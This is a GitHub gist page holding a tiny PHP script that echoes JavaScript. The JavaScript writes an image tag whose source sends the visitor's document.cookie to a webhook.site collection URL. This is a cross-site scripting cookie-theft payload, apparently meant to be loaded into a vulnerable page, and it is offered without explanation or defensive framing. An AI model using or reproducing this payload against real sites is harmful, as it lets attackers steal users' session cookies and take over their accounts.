Skip to content

Instantly share code, notes, and snippets.

@9932941Canada
Created August 24, 2019 17:40
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 9932941Canada/6e2cafe47ecff39b070a7432e5415ee4 to your computer and use it in GitHub Desktop.
Save 9932941Canada/6e2cafe47ecff39b070a7432e5415ee4 to your computer and use it in GitHub Desktop.
<?php
$html = <<<EOF
document.write('<img src ="https://webhook.site/282825ed-87fc-471f-9063-68bdbfaccfde?cookie='+(document.cookie||"no cookie!") + '/>')
EOF;
echo $html;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment